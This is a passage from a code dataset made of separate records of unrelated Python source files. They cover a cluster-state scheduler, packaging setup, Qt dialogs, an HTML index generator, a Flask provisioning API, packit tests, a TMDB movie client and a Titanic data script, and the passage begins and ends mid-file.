previous_state, nodestate))\n if self._cluster.clusterstate == Clusterstate.DELETING:\n if task.nodestate == Nodestate.DELETING_FAILED:\n self._cluster.clusterstate = Clusterstate.DELETING_FAILED\n if self._cluster.clusterstate != previous_clusterstate:\n log.info(\"Update %s's clusterstate from %s to %s. \" %(cluster_name, previous_clusterstate, self._cluster.clusterstate))\n return True\n elif task.nodestate in [Nodestate.SERVICE_RESTORING,\n Nodestate.SERVICE_RESTORING_FAILED,\n Nodestate.DATA_RESTORING,\n Nodestate.CHANGE_HOST_RESTORING,\n Nodestate.CHANGE_HOST_RESTORING_FAILED,\n Nodestate.PHYSICS_RESTORING,\n Nodestate.PHYSICS_RESTORING_FAILED]:\n task.nodestate = Nodestate.DELETED\n if self._cluster.clusterstate == Clusterstate.DELETINGNODE:\n if task.nodestate == Nodestate.DELETING_FAILED:\n self._cluster.clusterstate = Clusterstate.DELETINGNODE_FAILED\n if self._cluster.clusterstate != previous_clusterstate:\n log.info(\"Update %s's clusterstate from %s to %s. \" % (\n cluster_name, previous_clusterstate, self._cluster.clusterstate))\n return True\n elif previous_state in [Nodestate.DELETING,Nodestate.DELETED] \\\n and task.nodestate in [Nodestate.SERVICE_RESTORING,\n Nodestate.SERVICE_RESTORING_FAILED,\n Nodestate.DATA_RESTORING,\n Nodestate.CHANGE_HOST_RESTORING,\n Nodestate.CHANGE_HOST_RESTORING_FAILED,\n Nodestate.PHYSICS_RESTORING,\n Nodestate.PHYSICS_RESTORING_FAILED]:\n task.nodestate = Nodestate.DELETED\n return True\n if self.is_delete():\n self._cluster.clusterstate = Clusterstate.DELETED\n if self._cluster.clusterstate != previous_clusterstate:\n log.info(\"Update %s's clusterstate from %s to %s. \" % (\n cluster_name, previous_clusterstate, self._cluster.clusterstate))\n return True\n\n if self._cluster.clusterstate in [Clusterstate.DELETING,Clusterstate.DELETING_FAILED,Clusterstate.DELETED]:\n return True\n\n if self._cluster.clusterstate == Clusterstate.STARTING_FAILED and task.nodestate == Nodestate.STOPPED:\n return True\n\n if self._cluster.clusterstate in [Clusterstate.INITIALIZING, Clusterstate.LAUNCHING] and self.is_initialfail():\n self._cluster.clusterstate = Clusterstate.INITIALIZING_FAILED\n if self._cluster.clusterstate != previous_clusterstate:\n log.info(\"Update %s's clusterstate from %s to %s. \" % (\n cluster_name, previous_clusterstate, self._cluster.clusterstate))\n return True\n\n if self._cluster.clusterstate == Clusterstate.ADDINGNODE and \\\n previous_state in [Nodestate.STAGING, Nodestate.STARTING] and task.nodestate in [Nodestate.SERVICE_RESTORING,\n Nodestate.SERVICE_RESTORING_FAILED,\n Nodestate.CHANGE_HOST_RESTORING,\n Nodestate.CHANGE_HOST_RESTORING_FAILED,\n Nodestate.PHYSICS_RESTORING,\n Nodestate.PHYSICS_RESTORING_FAILED,\n Nodestate.STARTING_FAILED]:\n task.nodestate = Nodestate.STAGING_FAILED\n self._cluster.clusterstate = Clusterstate.ADDINGNODE_FAILED\n if self._cluster.clusterstate != previous_clusterstate:\n log.info(\"Update %s's clusterstate from %s to %s. \" % (\n cluster_name, previous_clusterstate, self._cluster.clusterstate))\n return True\n\n if self._cluster.clusterstate == Clusterstate.STARTINGNODE:\n if task.nodestate == Nodestate.STARTING_FAILED:\n self._cluster.clusterstate = Clusterstate.STARTINGNODE_FAILED\n if self._cluster.clusterstate != previous_clusterstate:\n log.info(\"Update %s's clusterstate from %s to %s. \" % (\n cluster_name, previous_clusterstate, self._cluster.clusterstate))\n return True\n if task.nodestate in [Nodestate.SERVICE_RESTORING,\n Nodestate.SERVICE_RESTORING_FAILED,\n Nodestate.DATA_RESTORING,\n Nodestate.CHANGE_HOST_RESTORING,\n Nodestate.CHANGE_HOST_RESTORING_FAILED,\n Nodestate.PHYSICS_RESTORING,\n Nodestate.PHYSICS_RESTORING_FAILED]:\n for task2 in self._cluster.tasks.values():\n if task2.nodestate in [Nodestate.STAGING, Nodestate.STARTING]:\n return True\n\n if self._cluster.clusterstate == Clusterstate.STOPPINGNODE:\n if task.nodestate == Nodestate.STOPPING_FAILED:\n self._cluster.clusterstate = Clusterstate.STOPPINGNODE_FAILED\n if self._cluster.clusterstate != previous_clusterstate:\n log.info(\"Update %s's clusterstate from %s to %s. \" % (\n cluster_name, previous_clusterstate, self._cluster.clusterstate))\n return True\n elif task.nodestate in [Nodestate.SERVICE_RESTORING,\n Nodestate.SERVICE_RESTORING_FAILED,\n Nodestate.DATA_RESTORING,\n Nodestate.CHANGE_HOST_RESTORING,\n Nodestate.CHANGE_HOST_RESTORING_FAILED,\n Nodestate.PHYSICS_RESTORING,\n Nodestate.PHYSICS_RESTORING_FAILED]:\n task.nodestate = Nodestate.STOPPED\n\n if self._cluster.clusterstate == Clusterstate.STARTING and self.is_starting_failed():\n self._cluster.clusterstate = Clusterstate.STARTING_FAILED\n if self._cluster.clusterstate != previous_clusterstate:\n log.info(\"Update %s's clusterstate from %s to %s. \" % (\n cluster_name, previous_clusterstate, self._cluster.clusterstate))\n return True\n\n if self._cluster.clusterstate == Clusterstate.STOPPING:\n if task.nodestate == Nodestate.STOPPING_FAILED:\n self._cluster.clusterstate = Clusterstate.STOPPIN_FAILED\n if self._cluster.clusterstate != previous_clusterstate:\n log.info(\"Update %s's clusterstate from %s to %s. \" % (\n cluster_name, previous_clusterstate, self._cluster.clusterstate))\n return True\n elif task.nodestate in Nodestate.SERVICE_RESTORING:\n task.nodestate = Nodestate.STOPPED\n\n if self.is_restore():\n self._cluster.clusterstate = Clusterstate.RESTORE\n if self._cluster.clusterstate != previous_clusterstate:\n log.info(\"Update %s's clusterstate from %s to %s. \" % (\n cluster_name, previous_clusterstate, self._cluster.clusterstate))\n return True\n\n if self.is_stopped():\n self._cluster.clusterstate = Clusterstate.STOPPED\n if self._cluster.clusterstate != previous_clusterstate:\n log.info(\"Update %s's clusterstate from %s to %s. \" % (\n cluster_name, previous_clusterstate, self._cluster.clusterstate))\n return True\n if previous_state == Nodestate.STOPPING and self.is_nodestop():\n self._cluster.clusterstate = Clusterstate.STOPNODE\n if self._cluster.clusterstate != previous_clusterstate:\n log.info(\"Update %s's clusterstate from %s to %s. \" % (\n cluster_name, previous_clusterstate, self._cluster.clusterstate))\n return True\n if self.is_running():\n self._cluster.clusterstate = Clusterstate.RUNNING\n if self._cluster.clusterstate != previous_clusterstate:\n log.info(\"Update %s's clusterstate from %s to %s. \" % (\n cluster_name, previous_clusterstate, self._cluster.clusterstate))\n return True\n if self.is_stopnode():\n self._cluster.clusterstate = Clusterstate.STOPNODE\n if self._cluster.clusterstate != previous_clusterstate:\n log.info(\"Update %s's clusterstate from %s to %s. \" % (\n cluster_name, previous_clusterstate, self._cluster.clusterstate))\n return True\n\n def clusterstate_upstate(self,clusterstate):\n with self._lock:\n previous_state = self._cluster.clusterstate\n if previous_state == clusterstate:\n return False\n self._cluster.clusterstate = clusterstate\n return True\n\n def is_running(self):\n for task in self._cluster.tasks.values():\n if task.nodestate in [Nodestate.DELETING,\n Nodestate.DELETED,\n Nodestate.DELETING_FAILED]:\n continue\n if task.nodestate != Nodestate.RUNNING:\n return False\n return True\n\n def is_stopnode(self):\n for task in self._cluster.tasks.values():\n if task.nodestate not in [Nodestate.RUNNING,\n Nodestate.STOPPED]:\n return False\n return True\n\n def is_delete(self):\n for task in self._cluster.tasks.values():\n if task.nodestate != Nodestate.DELETED:\n return False\n return True\n\n def is_restore(self):\n for task in self._cluster.tasks.values():\n if task.nodestate in [Nodestate.SERVICE_RESTORING,\n Nodestate.SERVICE_RESTORING_FAILED,\n Nodestate.DATA_RESTORING,\n Nodestate.CHANGE_HOST_RESTORING,\n Nodestate.CHANGE_HOST_RESTORING_FAILED,\n Nodestate.PHYSICS_RESTORING,\n Nodestate.PHYSICS_RESTORING_FAILED,\n Nodestate.SERVICE_RESTORE_START,\n Nodestate.CHANGE_HOST_RESTORE_START,\n Nodestate.PHYSICS_RESTORE_START]:\n return True\n return False\n\n def is_starting_failed(self):\n for task in self._cluster.tasks.values():\n if task.nodestate == Nodestate.STARTING_FAILED:\n return True\n return False\n\n def is_initialfail(self):\n for task in self._cluster.tasks.values():\n if task.nodestate in [Nodestate.SERVICE_RESTORING,\n Nodestate.SERVICE_RESTORING_FAILED,\n Nodestate.DATA_RESTORING,\n Nodestate.CHANGE_HOST_RESTORING,\n Nodestate.CHANGE_HOST_RESTORING_FAILED,\n Nodestate.PHYSICS_RESTORING,\n Nodestate.PHYSICS_RESTORING_FAILED,\n Nodestate.STARTING_FAILED]:\n task.nodestate = Nodestate.STARTING_FAILED\n return True\n return False\n\n def is_stopped(self):\n for task in self._cluster.tasks.values():\n if task.nodestate in [Nodestate.DELETING,\n Nodestate.DELETED,\n Nodestate.DELETING_FAILED]:\n continue\n if task.nodestate != Nodestate.STOPPED:\n return False\n return True\n\n def a_running(self):\n for task in self._cluster.tasks.values():\n if task.nodestate == Nodestate.RUNNING:\n return True\n return False\n\n\n def is_nodestop(self):\n if self.a_running():\n for task in self._cluster.tasks.values():\n if task.nodestate == Nodestate.RUNNING:\n continue\n if task.nodestate == Nodestate.STOPPING:\n return False\n if task.nodestate == Nodestate.STOPPED:\n return True\n return False\n else:\n return False\n\n\n\n\n\n\n\n","sub_path":"hyaline/scheduler/hyaline_state.py","file_name":"hyaline_state.py","file_ext":"py","file_size_in_byte":16519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"438619156","text":"from io import open\nfrom setuptools import find_packages, setup\n\nwith open('requirements.txt') as fp:\n install_requires = fp.read()\n\nsetup(\n name=\"tsvtools\",\n version=\"0.0.1\",\n author=\"\",\n author_email=\"qurator@sbb.spk-berlin.de\",\n description=\"neath\",\n long_description=open(\"README.md\", \"r\", encoding='utf-8').read(),\n long_description_content_type=\"text/markdown\",\n keywords='qurator',\n license='Apache License 2.0',\n url=\"https://github.com/qurator-spk/neath\",\n packages=find_packages(exclude=[\"*.tests\", \"*.tests.*\",\n \"tests.*\", \"tests\"]),\n install_requires=install_requires,\n entry_points={\n 'console_scripts': [\n \"extract-doc-links=tsvtools.cli:extract_document_links\",\n \"annotate-tsv=tsvtools.cli:annotate_tsv\",\n \"page2tsv=tsvtools.cli:page2tsv\",\n \"tsv2page=tsvtools.cli:tsv2page\",\n \"find-entities=tsvtools.cli:find_entities\",\n \"make-page2tsv-commands=tsvtools.cli:make_page2tsv_commands\"\n ]\n },\n python_requires='>=3.6.0',\n tests_require=['pytest'],\n classifiers=[\n 'Intended Audience :: Science/Research',\n 'License :: OSI Approved :: Apache Software License',\n 'Programming Language :: Python :: 3',\n 'Topic :: Scientific/Engineering :: Artificial Intelligence',\n ],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"345907557","text":"from deposit.commander.dialogs._Dialog import (Dialog)\n\nfrom qgis.PyQt import (QtWidgets, QtCore, QtGui)\n\nclass LinkDB(Dialog):\n\t\n\tdef title(self):\n\t\t\n\t\treturn \"Link Database\"\n\t\n\tdef set_up(self):\n\t\t\n\t\tself.setMinimumWidth(600)\n\t\tself.setModal(True)\n\t\tself.layout = QtWidgets.QVBoxLayout()\n\t\tself.setLayout(self.layout)\n\t\t\n\t\tself.form_layout = QtWidgets.QFormLayout()\n\t\tself.form = QtWidgets.QWidget()\n\t\tself.form.setLayout(self.form_layout)\n\t\tself.layout.addWidget(self.form)\n\t\t\n\t\tself.db = self.model.datasources.DB()\n\t\tself.dbrel = self.model.datasources.DBRel()\n\t\tself.ds = None\n\t\t\n\t\tconnstrings = []\n\t\tfor row in self.view.menu.get_recent(): # [[url], [identifier, connstr], ...]\n\t\t\tif len(row) == 2:\n\t\t\t\tconnstrings.append(row[1])\n\t\t\n\t\tself.connstr = QtWidgets.QComboBox()\n\t\tif connstrings:\n\t\t\tself.connstr.addItems(connstrings)\n\t\tself.connstr.setEditable(True)\n\t\tself.connstr.currentTextChanged.connect(self.on_connstr_changed)\n\t\t\n\t\tself.identifier = QtWidgets.QListWidget()\n\t\t\n\t\tself.form_layout.addRow(\"Connect string:\", self.connstr)\n\t\tself.form_layout.addRow(\"Identifier:\", self.identifier)\n\t\t\n\t\tif connstrings:\n\t\t\tself.on_connstr_changed(connstrings[0])\n\t\n\tdef on_connstr_changed(self, connstr):\n\t\t\n\t\tself.identifier.clear()\n\t\tself.identifier.setEnabled(False)\n\t\tself.ds = None\n\t\tif connstr:\n\t\t\tif self.dbrel.set_connstr(connstr) and self.dbrel.is_valid():\n\t\t\t\tself.identifier.addItem(self.dbrel.get_identifier())\n\t\t\t\tself.ds = self.dbrel\n\t\t\t\treturn\n\t\t\t\n\t\t\tif self.db.set_connstr(connstr):\n\t\t\t\tidentifiers = self.db.get_identifiers()\n\t\t\t\tif identifiers:\n\t\t\t\t\tself.identifier.addItems(identifiers)\n\t\t\t\t\tself.identifier.setEnabled(True)\n\t\t\t\t\tself.ds = self.db\n\t\n\tdef process(self):\n\t\t\n\t\titem = self.identifier.currentItem()\n\t\tif item and item.isSelected():\n\t\t\tidentifier = item.text()\n\t\t\tif identifier and (not self.ds is None):\n\t\t\t\tif self.ds.identifier is None:\n\t\t\t\t\tself.ds.set_identifier(identifier)\n\t\t\t\tself.ds.link()\n\t\t\t\tself.view.menu.add_recent_db(self.ds.identifier, self.ds.connstr)\n\t\n\t","sub_path":"deposit/commander/dialogs/LinkDB.py","file_name":"LinkDB.py","file_ext":"py","file_size_in_byte":2006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"334937958","text":"#!/usr/bin/python\n\n## build_html_index.py\n\nimport sys\nimport os\nimport glob\nimport time\n\n\nclass IndexPage():\n html_Template = \"\"\"\n\n\t\n\t\t%%Title%%\n \n\t\t\n\t\n\n\t\n
\n \t
\n \n
\n\n \t
\n

%%Title2%%

\n
\n\t %%REPEAT%%

%%DOCName%% - %%DOCTitle%% %%DOCDescr%%

%%REPEAT%%\n\t
\n
\n\n
\n

For any questions please contact: Response Geospatial Office

\n
\n
\n\t\"\"\"\n \n Title = \"FEMA Public Files\"\n Title2 = \"\"\n tokens = [\"DOCURL\",\"DOCName\", \"DOCTitle\", \"DOCDescr\"]\n Contact = ''\n ContactURL = ''\n\n def __init__(self, fHandle, pageTitle, contents):\n self.fH = fHandle\n self.Title = pageTitle\n self.contents = contents\n\n def writeHeader(self):\n d = self.html_Template.split(\"%%REPEAT%%\")[0]\n d = d.replace(\"%%Title%%\", self.Title)\n d = d.replace(\"%%Title2%%\", self.Title2)\n self.fH.write(d)\n\n def format_contents(self, data):\n if data[3]:\n d = {\"DOCURL\":data[0], \"DOCName\": data[0], \"DOCTitle\":data[1], \"DOCDescr\": '', \"isDir\":data[3]}\n else:\n d = {\"DOCURL\":data[0], \"DOCName\": data[0], \"DOCTitle\":data[1], \"DOCDescr\": \"created: \" + time.ctime(data[2]), \"isDir\":data[3]} \n return d\n \n def writeItems(self):\n rpt = self.html_Template.split(\"%%REPEAT%%\")[1]\n rep = \"\"\n for da in self.contents:\n if da[0] == 'index.html':\n continue\n d = self.format_contents(da)\n r = rpt\n for k in self.tokens:\n r = r.replace('%%'+k+'%%', d[k] or '')\n rep = rep + r\n self.fH.write(rep)\n\n def writeFooter(self):\n d = self.html_Template.split(\"%%REPEAT%%\")[-1]\n d = d.replace(\"%%Contact%%\", self.Contact)\n d = d.replace(\"%%ContactURL%%\", self.ContactURL)\n self.fH.write(d)\n\ndef get_dir_contents(srchPath):\n data = []\n parts = os.listdir(srchPath)\n for p in parts:\n pq = os.path.join(srchPath, p)\n isDir = os.path.isdir(pq)\n objTime = os.path.getmtime(pq)\n objTitle = ''\n data.append([p, objTitle, objTime, isDir])\n return data\n\ndef build_index_page(data, title, dirPath):\n with open(os.path.join(dirPath,'index.html'), 'wt') as indexFile:\n indexPage = IndexPage(indexFile, title, data)\n indexPage.writeHeader()\n indexPage.writeItems()\n \n indexPage.writeFooter()\n\ndef main(args):\n sDir = args[0] or './raw'\n p = get_dir_contents(sDir)\n build_index_page(p, args[1] or 'VIIRS Flooded Areas', sDir)\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","sub_path":"pr_3d/build_html_index.py","file_name":"build_html_index.py","file_ext":"py","file_size_in_byte":4304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"97870175","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSchames listing APIs\n\"\"\"\nimport logging\nimport importlib\nimport httplib\n\nfrom flask import Blueprint, current_app, url_for, abort, request, g\nfrom flask_restful import Api, Resource\n\nfrom driftconfig.util import get_drift_config\nfrom driftconfig.relib import create_backend, get_store_from_url\nfrom drift.core.extensions.jwt import jwt_not_required\n\nfrom drift.auth.jwtchecker import requires_roles\nfrom drift.core.extensions.schemachecker import simple_schema_request\n\nlog = logging.getLogger(__name__)\nbp = Blueprint(\"admin\", __name__)\napi = Api(bp)\n\nclass AdminProvisionAPI(Resource):\n\n no_jwt_check = [\"POST\"]\n\n #@requires_roles(\"service\")\n @simple_schema_request({\n \"provisioners\": {\"type\": \"array\", },\n }, required=[])\n def post(self):\n tenant_name = g.conf.tenant_name['tenant_name']\n tier_name = g.conf.tier['tier_name']\n\n # quick check for tenant state before downloading config\n if g.conf.tenant[\"state\"] != \"initializing\":\n abort(httplib.BAD_REQUEST, message=\"You can only provision tenants which are in state 'initializing'. Tenant '%s' is in state '%s'\" % (tenant_name, g.conf.tenant[\"state\"]))\n\n args_per_provisioner = {}\n if request.json:\n for arg in request.json.get(\"provisioners\", {}):\n if \"provisioner\" not in arg or \"arguments\" not in arg:\n log.warning(\"Provisioner argument missing 'provisioner' or 'arguments'\")\n continue\n args_per_provisioner[arg[\"provisioner\"]] = arg[\"arguments\"]\n\n origin = g.conf.domain['origin']\n ts = get_store_from_url(origin)\n conf = get_drift_config(\n ts=ts,\n tenant_name=tenant_name,\n tier_name=tier_name,\n deployable_name=current_app.config['name']\n )\n\n\n if conf.tenant[\"state\"] != \"initializing\":\n raise RuntimeError(\"Tenant unexpectedly found in state '%s': %s\" % (conf.tenant[\"state\"], conf.tenant))\n\n resources = current_app.config.get(\"resources\")\n for module_name in resources:\n m = importlib.import_module(module_name)\n if hasattr(m, \"provision\"):\n provisioner_name = m.__name__.split('.')[-1]\n log.info(\"Provisioning '%s' for tenant '%s' on tier '%s'\", provisioner_name, tenant_name, tier_name)\n\n args = args_per_provisioner.get(provisioner_name, {})\n m.provision(conf, args)\n\n # Mark the tenant as ready\n conf.tenant[\"state\"] = \"active\"\n\n # Save out config\n log.info(\"Saving config to %s\", origin)\n origin_backend = create_backend(origin)\n origin_backend.save_table_store(ts)\n\n local_origin = 'file://~/.drift/config/' + g.conf.domain['domain_name']\n log.info(\"Saving config to %s\", local_origin)\n local_store = create_backend(local_origin)\n local_store.save_table_store(ts)\n\n # invalidate flask config\n current_app.extensions['driftconfig'].refresh()\n\n return \"OK\"\n\n\napi.add_resource(AdminProvisionAPI, \"/provision\")\n","sub_path":"drift/core/apps/provision/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"419925482","text":"# coding=utf-8\nfrom PyQt4 import QtGui, QtCore\nimport sys\nimport os\n\n\nclass widget(QtGui.QWidget):\n def __init__(self):\n\n super(widget, self).__init__()\n\n # self.setWindowIcon()\n self.setWindowTitle('Настройки')\n\n self.buildGUI()\n self.setupConnections()\n\n def buildGUI(self):\n self.setFixedSize(600, 400)\n\n self.mpd_ip1 = '127.0.0.1'\n self.mpd_port1 = '6660'\n self.tray_st = '1'\n\n if \".settings.conf\" in os.listdir():\n self.file = open('.settings.conf', 'r')\n count = 0\n for line in self.file:\n if count == 0:\n self.mpd_ip1 = line[7:-1]\n if count == 1:\n self.mpd_port1 = line[9:-1]\n if count == 2:\n self.tray_st = line[5:6]\n count += 1\n self.button_accept = QtGui.QPushButton(self)\n self.button_cancel = QtGui.QPushButton(self)\n\n self.button_accept.setGeometry(430, 364, 70, 30)\n self.button_accept.setText(\"Приянть\")\n\n self.button_cancel.setGeometry(510, 364, 70, 30)\n self.button_cancel.setText(\"Отмена\")\n\n self.qlist1 = QtGui.QListWidget(self)\n self.qlist1.setGeometry(-1, -1, 200, 360)\n\n self.qlist2 = QtGui.QListWidget(self)\n self.qlist2.setGeometry(205, -1, 400, 360)\n\n self.qlist1.addItem(\"Общие\")\n\n def clearList(self):\n self.qlist2.clear()\n\n def items_for_general(self):\n self.checkbox = QtGui.QListWidgetItem()\n self.checkbox.setText(\n \"Включить Tray\")\n self.checkbox.setFlags(self.checkbox.flags() |\n QtCore.Qt.ItemIsUserCheckable)\n self.checkbox.setCheckState(QtCore.Qt.Checked)\n self.qlist2.addItem(self.checkbox)\n self.tray_st = self.checkbox.checkState()\n\n self.mpd_path = QtGui.QListWidgetItem()\n self.mpd_path.setText(self.mpd_ip1)\n self.mpd_path.setFlags(self.mpd_path.flags() |\n QtCore.Qt.ItemIsEditable)\n self.mpd_port = QtGui.QListWidgetItem()\n self.mpd_port.setText(self.mpd_port1)\n self.mpd_port.setFlags(self.mpd_port.flags() |\n QtCore.Qt.ItemIsEditable)\n self.qlist2.addItem(self.mpd_path)\n self.qlist2.addItem(self.mpd_port)\n\n def itemClickedqlist1(self, item):\n self.clearList()\n if item.text() == \"Общие\":\n self.items_for_general()\n\n def setupConnections(self):\n self.connect(self.qlist1,\n QtCore.SIGNAL(\"itemClicked(QListWidgetItem*)\"),\n self.itemClickedqlist1)\n self.button_cancel.clicked.connect(self.cancel_action)\n self.button_accept.clicked.connect(self.accept_action)\n\n def cancel_action(self, event):\n self.deleteLater()\n\n def accept_action(self, event):\n self.file = open('.settings.conf', 'w')\n self.file.write(\"mpd_ip \" + str(self.mpd_path.text()) + \"\\n\")\n self.file.write(\"mpd_port \" + str(self.mpd_port.text()) + \"\\n\")\n if self.tray_st == 0:\n self.file.write(\"tray 0\\n\")\n else:\n self.file.write(\"tray 1\\n\")\n self.file.close()\n self.deleteLater()\n\n\nif __name__ == \"__main__\":\n qapp = QtGui.QApplication(sys.argv)\n w = widget()\n w.show()\n sys.exit(qapp.exec_())\n","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":3445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"590506940","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jan 22 12:18:38 2020\r\n\r\n@author: Student\r\n\"\"\"\r\n\r\nc=int(input(\"Enter no. of rows:\" ))\r\nfor i in range(0,c):\r\n if i==int(c/2):\r\n print(\" \",end=\" \") \r\n for i in range(0,c): \r\n print(\"*\",end=\" \")\r\n if i==c-1:\r\n print()\r\n else:\r\n print(\" \"*c+\"*\") \r\n\r\n ","sub_path":"python/module 3/pattern3.py","file_name":"pattern3.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"195758420","text":"\"\"\"\nE2E tests which utilize cockpit projects\n\"\"\"\nimport shutil\nfrom pathlib import Path\n\nimport pytest\nfrom flexmock import flexmock\n\nfrom packit.api import PackitAPI\nfrom packit.config import get_local_package_config\nfrom packit.distgit import DistGit\nfrom packit.fedpkg import FedPKG\nfrom packit.local_project import LocalProject\nfrom packit.utils import cwd\nfrom tests.spellbook import UP_COCKPIT_OSTREE, initiate_git_repo, get_test_config\n\n\n@pytest.fixture()\ndef cockpit_ostree(tmpdir):\n t = Path(str(tmpdir))\n\n u = t / \"up\"\n shutil.copytree(UP_COCKPIT_OSTREE, u)\n initiate_git_repo(u, tag=\"179\")\n\n return u\n\n\ndef test_update_on_cockpit_ostree(cockpit_ostree):\n def mocked_new_sources(sources=None):\n if not Path(sources).is_file():\n raise RuntimeError(\"archive does not exist\")\n\n flexmock(FedPKG, init_ticket=lambda x=None: None, new_sources=mocked_new_sources)\n\n flexmock(\n DistGit,\n push_to_fork=lambda *args, **kwargs: None,\n is_archive_in_lookaside_cache=lambda archive_path: False,\n )\n flexmock(\n PackitAPI,\n push_and_create_pr=lambda pr_title, pr_description, dist_git_branch: None,\n )\n\n pc = get_local_package_config(str(cockpit_ostree))\n up_lp = LocalProject(working_dir=str(cockpit_ostree))\n c = get_test_config()\n\n api = PackitAPI(c, pc, up_lp)\n with cwd(cockpit_ostree):\n api.sync_release(\n \"master\",\n use_local_content=False,\n version=\"179\",\n force_new_sources=False,\n create_pr=True,\n )\n\n assert api.dg.download_upstream_archive().is_file()\n","sub_path":"tests/integration/test_using_cockpit.py","file_name":"test_using_cockpit.py","file_ext":"py","file_size_in_byte":1632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"76421931","text":"# -*- coding: utf-8 -*-\nimport re\nfrom aiocache import cached\n\nfrom somali import aiorequests, config\n\n\nclass Movie:\n base_url = config.tmdb_url\n key = config.tmdb_key\n genre_id_to_quote = {\n 12: \"que tal uma aventura?\",\n 14: \"embarque em uma fantasia:\",\n 16: \"quer uma bela animação?\",\n 18: \"drama sempre cai bem:\",\n 27: \"é hora do terror:\",\n 28: \"experimente um pouco de ação:\",\n 35: \"relaxe com uma boa comédia:\",\n 36: \"você gosta de História?\",\n 37: \"bang bang! Reviva o faroeste:\",\n 53: \"reúna o pessoal pra esse suspense:\",\n 80: \"embarque nesse crime:\",\n 99: \"informe-se com esse documentário:\",\n 878: \"que tal um pouco de ficção científica?\",\n 9648: \"você gosta de um mistério?\",\n 10402: \"solte a voz com esse musical:\",\n 10749: \"mergulhe nesse romance:\",\n 10751: \"reúna a família ou amigos e veja:\",\n 10752: \"em clima de guerra:\",\n 10759: \"um pouco de ação e aventura:\",\n 10763: \"que tal experimentar algo jornalístico?\",\n 10762: \"caso queira algo mais infantil:\",\n 10764: \"por que não um reality show?\",\n 10765: \"ficção científica e fantasia:\",\n 10766: \"conhece o gênero soap opera?\",\n 10767: \"por que não um talk show?\",\n 10768: \"um pouco de guerra e política:\",\n 10770: \"mergulhe no cinema:\",\n }\n main_providers = {\n \"netflix\": 8,\n \"prime\": 119,\n \"disney+\": 337,\n \"itunes\": 2,\n \"google\": 3,\n \"looke\": 47,\n \"fox\": 229,\n \"mubi\": 11,\n \"star+\": 619,\n \"paramount+\": 531,\n \"hbo\": 384,\n \"claro\": 167,\n \"telecine\": 227,\n \"globo\": 307,\n }\n\n @classmethod\n @cached(ttl=3600)\n async def request(cls, path, **kwargs):\n url = f\"{cls.base_url}/{path}\"\n headers = {\n \"Content-Type\": \"application/json\",\n \"Accept\": \"application/json\",\n \"Connection\": \"close\",\n }\n default_params = {\"api_key\": cls.key, \"language\": \"pt-BR\"}\n params = kwargs.get(\"params\")\n if params:\n params.update(default_params)\n else:\n params = default_params\n return await aiorequests.get(url, params=params, headers=headers)\n\n @classmethod\n async def details(cls, id):\n return await cls.request(f\"movie/{id}\")\n\n @classmethod\n async def credits(cls, id):\n return await cls.request(f\"movie/{id}/credits\")\n\n @classmethod\n async def ids(cls, id):\n return await cls.request(f\"movie/{id}/external_ids\")\n\n @classmethod\n async def lists(cls, id):\n return await cls.request(f\"movie/{id}/lists\")\n\n @classmethod\n async def recommendation(cls, id):\n return await cls.request(f\"movie/{id}/recommendations\")\n\n @classmethod\n async def similar(cls, id):\n return await cls.request(f\"movie/{id}/similar_movies\")\n\n @classmethod\n async def watch(cls, id):\n return await cls.request(f\"movie/{id}/watch/providers\")\n\n @classmethod\n async def upcoming(cls):\n return await cls.request(\"movie/upcoming\", params={\"region\": \"BR\"})\n\n @classmethod\n async def now(cls):\n return await cls.request(\"movie/now_playing\", params={\"region\": \"BR\"})\n\n @classmethod\n async def latest(cls):\n return await cls.request(\"movie/latest\")\n\n @classmethod\n async def popular(cls):\n return await cls.request(\"movie/popular\")\n\n @classmethod\n async def top(cls):\n return await cls.request(\"movie/top_rated\")\n\n @classmethod\n async def discover(cls, provider):\n return await cls.request(\"discover/movie\", params={\"with_watch_providers\": provider, \"watch_region\": \"BR\"})\n\n @classmethod\n async def trend(cls):\n return await cls.request(\"trending/movie/day\")\n\n @classmethod\n async def search(cls, query):\n return await cls.request(\"search/movie\", params={\"query\": query})\n\n @classmethod\n async def from_imdb(cls, imdb_id):\n return await cls.request(f\"find/{imdb_id}\", params={\"external_source\": \"imdb_id\"})\n\n @classmethod\n async def find(cls, query):\n imdb_id = re.search(r\"(?:imdb.com\\/title\\/)?(tt[0-9]{9})\", query)\n if imdb_id:\n return await cls.from_imdb(imdb_id[1])\n response = await cls.search(query)\n return response[\"results\"][0] if response[\"results\"] else {}\n","sub_path":"somali/apis/movie.py","file_name":"movie.py","file_ext":"py","file_size_in_byte":4481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"300420767","text":"import csv\nimport re\nimport sys\nimport pandas as pd \nimport numpy as np\nimport collections\n\n\"\"\"\nfamily id\n\"\"\"\n\nif __name__ == '__main__':\n\n\tdata = pd.read_csv('data/test_5.csv')\n\tdata1 = pd.read_csv('data/train_5.csv')\n\n\tfor index,row in data.iterrows():\n\t\tif type(row['Cabin']) is str:\n\t\t\tdata.ix[index,'Cabin'] = str(row['Cabin'][0])\n\t\telse :\n\t\t\tdata.ix[index,'Cabin'] = str('N/A')\n\tfor index1,row1 in data1.iterrows():\n\t\tif type(row1['Cabin']) is str:\n\t\t\tdata1.ix[index1,'Cabin'] = str(row1['Cabin'][0])\n\t\telse 